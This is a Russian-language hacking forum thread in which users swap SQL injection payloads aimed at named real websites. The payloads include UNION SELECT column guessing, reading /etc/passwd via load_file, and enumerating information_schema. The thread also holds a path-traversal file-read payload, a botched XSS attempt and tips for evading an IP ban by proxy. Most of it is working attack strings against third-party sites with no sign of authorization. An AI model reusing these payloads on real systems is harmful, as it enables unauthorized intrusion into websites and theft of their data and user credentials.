это нормально, у пользователя mysql нет прав на чтение файлов. А ошибку выкидывает потомы что фильтруется кавычка. что делать - подбирать таблицу с пользователями и надеятся что пароли подойдут к админке, а лучше ссылку на сайт
ну это совсем не факт смотря каие там "тут числа", мож файла такого просто не существует, timlame, попробуй: site.ru/news.php?id=-1+union+select+1,2,load_file(0x2F6574632F706173737764),444,5,6,7,8,9,10/* если не увидишь ничего, то или ось винда или файловых привилегий нет скорее второе
и в случае отсутствия файла и в случае если нет файловых привилегий ошибка возникает тогда, когда ты в load_file() (при наличии file_priv) передал только имя не существующей директории
вместо сайт пусь буит www.debilko.ru знач,как я понял,должно быть так: GET /index.html HTTP/1.1 Host: debilko<xscript>alert('XSS');</xscript>.ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Connection: Keep-Alive йа пробывал и гет и пост. Вообще скажите, код то можно внедрить ?)
GET /index.html HTTP/1.1 Host: debilko.ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Connection: Keep-Alive так должно быть. А ты вообще что хочешь сделать? Почитай про синтаксис http 1.0. Думаю, поймешь, че за чушь написал.
я хотел через HTTP внедрить на хтмл сайт XSS Я знаю шо твой запрос пральный,ток xspider написал какуюто Г.мол бага есь и запрос)
И ещё вопрос. пробывал тут sql- запросы на qwerty.ru http://qwerty.ru/news.php?id=9999997999+select+union+null,null Если он выдаёт при таком запросе список всех тем,и при ID=1+1; 2+1 не реагирует- баги нету? P.S. на запрос or 1=1 выдаёт список всех тем,найденных на серве(без кавычек).С кавычками ашиппко... Рассудите меня :Р
Какую-то хрень твой спайдер написал =) Чтобы внедрить js-код, надо в параметрах, которые используются скриптом передать в качестве значения js-код. host не является таким параметром. Им может являться refferer или user-agent или другие параметры, кот. используются непосредственно в скрипте.
http://www.dukemednews.org/news/article.php?id=10059+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* Народ,объясните кто-нибудь,как подобрать здесь количество столбцов и строк(как было написано).Подбирал строки- пишет ошибки какие-то.Подбирал ещё запросом -10059+order+by+10000,куча ошибок. Чем меньше число после by,тем меньше ошибок,но толку нет.(какое макс количество полей может быть я хз)).
Вазможно ли как либо пробиться., у нас на провайдаре есть внутринный ресурс all.gs.uz там выставляют разные новасти из за канфликта по однаму вапросу с админом сайта, на вход в этот сайт по локальной сети меня заблакировали до 23 января и типерь когда я пытаюсь зайти по локальной сети пишет что нельзя зяйти
Смотря по чём тебя забанили 1. Логин 2. IP and/or MAC Первое решается ну очень просто, хотя я думаю что тебя банили по второму, так как ты в локалке то я думаю есть вариант со сменой ИП, если такой возможности нет но оч. хочется, то как вариант можешь договорится с другом и поставить у него прокси, и ходить через него. пс: если друг вдруг станит не_друг, то заодно сможешь за его счет ходить в инет)))
Fatal error: main(): Failed opening required 'articles/000117 union select null,null/*/text.htm' (include_path='.:/usr/local/share/pear') Кто-нить знает,чё за ошибка такая? бадяга то точно есь: ))(чето пропуть пишет)
это инклуд или читалка файлов. попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00" и почитай статьи на эту тему
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/* P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)( _________________________________________________________________________ http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/* Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
невоткнул где вывод, но есть схема таблес: http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+information_schema.tables/* надо просто было подставить нге существующий id. вот: 4твёртая версия, дальше уж подбирай. http://www.happyland-drink.ru/brands.php?id=-2+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,%2027,28/*
